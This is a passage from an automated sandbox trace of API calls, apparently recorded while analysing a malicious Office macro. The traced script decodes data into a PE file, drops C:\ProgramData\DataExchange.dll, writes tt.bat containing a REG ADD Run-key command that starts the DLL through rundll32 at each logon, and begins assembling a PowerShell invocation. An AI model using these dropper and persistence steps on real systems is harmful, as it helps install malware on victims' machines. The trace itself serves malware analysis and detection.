pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.173] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.173] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.173] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.173] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.173] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.173] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.173] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.173] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.173] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.173] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.173] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.174] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.174] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.174] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.174] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.174] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.174] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.174] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.174] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.174] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.174] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.174] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.174] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.174] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.174] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.174] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.174] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.174] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.175] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.175] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.175] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.176] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.177] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.178] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.217] GetAsyncKeyState (vKey=27) returned 0 [0203.421] GetAsyncKeyState (vKey=27) returned 0 [0203.421] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="\x15Œ\x81", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.623] GetAsyncKeyState (vKey=27) returned 0 [0203.851] GetAsyncKeyState (vKey=27) returned 0 [0204.044] GetAsyncKeyState (vKey=27) returned 0 [0204.247] GetAsyncKeyState (vKey=27) returned 0 [0204.450] GetAsyncKeyState (vKey=27) returned 0 [0204.652] GetAsyncKeyState (vKey=27) returned 0 [0204.855] GetAsyncKeyState (vKey=27) returned 0 [0205.058] GetAsyncKeyState (vKey=27) returned 0 [0205.261] GetAsyncKeyState (vKey=27) returned 0 [0205.464] GetAsyncKeyState (vKey=27) returned 0 [0205.666] GetAsyncKeyState (vKey=27) returned 0 [0205.961] GetAsyncKeyState (vKey=27) returned 0 [0206.119] GetAsyncKeyState (vKey=27) returned 0 [0206.322] GetAsyncKeyState (vKey=27) returned 0 [0206.525] GetAsyncKeyState (vKey=27) returned 0 [0206.727] GetAsyncKeyState (vKey=27) returned 0 [0206.930] GetAsyncKeyState (vKey=27) returned 0 [0207.180] GetAsyncKeyState (vKey=27) returned 0 [0207.383] GetAsyncKeyState (vKey=27) returned 0 [0207.586] GetAsyncKeyState (vKey=27) returned 0 [0207.788] GetAsyncKeyState (vKey=27) returned 0 [0207.791] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x51c6d0, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1ddfb0*="CreateTextFile", cNames=0x1, lcid=0x409, rgDispId=0x1ddf94 | out: rgDispId=0x1ddf94*=1101) returned 0x0 [0207.791] FileSystemObject:IDispatch:Invoke (in: This=0x51c6d0, dispIdMember=1101, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1ddf48*(rgvarg=([0]=0xa025f20*(varType=0x400c, wReserved1=0xa21, wReserved2=0x0, wReserved3=0x0, varVal1=0xa026068*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\DataExchange.dll" (normalized: "c:\\programdata\\dataexchange.dll"), varVal2=0x0), varVal2=0xa026068)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xa0260f0, pExcepInfo=0x1ddf60, puArgErr=0x1ddf40 | out: pDispParams=0x1ddf48*(rgvarg=([0]=0xa025f20*(varType=0x400c, wReserved1=0xa21, wReserved2=0x0, wReserved3=0x0, varVal1=0xa026068*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\DataExchange.dll", varVal2=0x0), varVal2=0xa026068)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xa0260f0*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x468440, varVal2=0x0), pExcepInfo=0x1ddf60*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1ddf40*=0x1ddf94) returned 0x0 [0207.828] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x468440, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1de050*="WriteLine", cNames=0x1, lcid=0x409, rgDispId=0x1de034 | out: rgDispId=0x1de034*=10008) returned 0x0 [0207.828] FileSystemObject:IDispatch:Invoke (in: This=0x468440, dispIdMember=10008, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x1ddfe8*(rgvarg=([0]=0xa025f20*(varType=0x8, wReserved1=0xa02, wReserved2=0x0, wReserved3=0x0, varVal1=0x11520018*, varVal2=0x1de050)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x1de000, puArgErr=0x1ddfe0 | out: pDispParams=0x1ddfe8*(rgvarg=([0]=0xa025f20*(varType=0x8, wReserved1=0xa02, wReserved2=0x0, wReserved3=0x0, varVal1=0x11520018*, varVal2=0x1de050)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x1de000*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1ddfe0*=0x1de034) returned 0x0 [0207.888] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x468440, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1de050*="Close", cNames=0x1, lcid=0x409, rgDispId=0x1de034 | out: rgDispId=0x1de034*=10012) returned 0x0 [0207.889] FileSystemObject:IDispatch:Invoke (in: This=0x468440, dispIdMember=10012, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x1ddfe8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x1de000, puArgErr=0x1ddfe0 | out: pDispParams=0x1ddfe8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x1de000*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1ddfe0*=0x1de034) returned 0x0 [0207.911] GetUserDefaultLCID () returned 0x409 [0207.911] malloc (_Size=0xa0) returned 0x48ab340 [0207.911] free (_Block=0x48ab340) [0207.912] malloc (_Size=0xa0) returned 0x48ab340 [0207.913] free (_Block=0x48ab340) [0207.913] malloc (_Size=0xa0) returned 0x48ab340 [0207.913] free (_Block=0x48ab340) [0207.914] malloc (_Size=0xa0) returned 0x48ab340 [0207.914] realloc (_Block=0x48ab340, _Size=0x140) returned 0x11f50350 [0207.914] realloc (_Block=0x11f50350, _Size=0x1e0) returned 0x11f50350 [0207.914] realloc (_Block=0x11f50350, _Size=0x280) returned 0x11f50350 [0207.914] realloc (_Block=0x11f50350, _Size=0x320) returned 0x11f50350 [0207.914] realloc (_Block=0x11f50350, _Size=0x3c0) returned 0x11f50350 [0207.914] realloc (_Block=0x11f50350, _Size=0x460) returned 0x11f50350 [0207.919] free (_Block=0x11f50350) [0207.920] malloc (_Size=0xa0) returned 0x48ab340 [0207.920] free (_Block=0x48ab340) [0207.921] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x51c6d0, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1ddfb0*="CreateTextFile", cNames=0x1, lcid=0x409, rgDispId=0x1ddf94 | out: rgDispId=0x1ddf94*=1101) returned 0x0 [0207.921] FileSystemObject:IDispatch:Invoke (in: This=0x51c6d0, dispIdMember=1101, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x1ddf48*(rgvarg=([0]=0xa025f20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tt.bat" (normalized: "c:\\programdata\\tt.bat"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xa026020, pExcepInfo=0x1ddf60, puArgErr=0x1ddf40 | out: pDispParams=0x1ddf48*(rgvarg=([0]=0xa025f20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\ProgramData\\tt.bat", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0xa026020*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x469080, varVal2=0x1de050), pExcepInfo=0x1ddf60*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1ddf40*=0x1ddf94) returned 0x0 [0207.923] FileSystemObject:IUnknown:Release (This=0x468440) returned 0x0 [0207.923] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x469080, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1de050*="WriteLine", cNames=0x1, lcid=0x409, rgDispId=0x1de034 | out: rgDispId=0x1de034*=10008) returned 0x0 [0207.923] FileSystemObject:IDispatch:Invoke (in: This=0x469080, dispIdMember=10008, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x1ddfe8*(rgvarg=([0]=0xa025f20*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa025fa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v AutoStart /t REG_SZ /d \"rundll32.exe C:\\ProgramData\\DataExchange.dll,Start\"", varVal2=0x0), varVal2=0xa025fa8)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x1de000, puArgErr=0x1ddfe0 | out: pDispParams=0x1ddfe8*(rgvarg=([0]=0xa025f20*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xa025fa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v AutoStart /t REG_SZ /d \"rundll32.exe C:\\ProgramData\\DataExchange.dll,Start\"", varVal2=0x0), varVal2=0xa025fa8)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x1de000*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1ddfe0*=0x1de034) returned 0x0 [0207.924] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x469080, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x1de050*="Close", cNames=0x1, lcid=0x409, rgDispId=0x1de034 | out: rgDispId=0x1de034*=10012) returned 0x0 [0207.925] FileSystemObject:IDispatch:Invoke (in: This=0x469080, dispIdMember=10012, riid=0x7fee51b78a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x1ddfe8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x1de000, puArgErr=0x1ddfe0 | out: pDispParams=0x1ddfe8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x1de000*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x1ddfe0*=0x1de034) returned 0x0 [0207.959] GetUserDefaultLCID () returned 0x409 [0207.959] malloc (_Size=0xa0) returned 0x48ab340 [0207.959] realloc (_Block=0x48ab340, _Size=0x140) returned 0x11f50350 [0207.960] free (_Block=0x11f50350) [0207.961] malloc (_Size=0xa0) returned 0x48ab340 [0207.961] free (_Block=0x48ab340) [0207.961] malloc (_Size=0xa0) returned 0x48ab340 [0207.961] free (_Block=0x48ab340) [0207.961] malloc (_Size=0xa0) returned 0x48ab340 [0207.962] free (_Block=0x48ab340) [0207.962] malloc (_Size=0xa0) returned 0x48ab340 [0207.962] free (_Block=0x48ab340) [0212.320] GetAsyncKeyState (vKey=27) returned 0 [0212.320] GetUserDefaultLCID () returned 0x409 [0212.320] malloc (_Size=0xa0) returned 0x48ab340 [0212.320] realloc (_Block=0x48ab340, _Size=0x140) returned 0x11f50350 [0212.321] realloc (_Block=0x11f50350, _Size=0x1e0) returned 0x11f50350 [0212.321] realloc (_Block=0x11f50350, _Size=0x280) returned 0x11f50350 [0212.323] free (_Block=0x11f50350) [0212.323] VarBstrCat (in: bstrLeft="&H", bstrRight="70", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0212.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2658508, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115fdbf8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e18, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991f248, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6e48, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x991cd88, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x115f6ae8, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655648, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655808, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26555e8, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0212.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655608, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0212.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655828, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0212.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655548, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0212.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x2655528, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0212.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26554e8, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0212.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26553e8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0212.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1dde90, cbMultiByte=1, lpWideCharStr=0x26553c8, cchWideChar=1 | 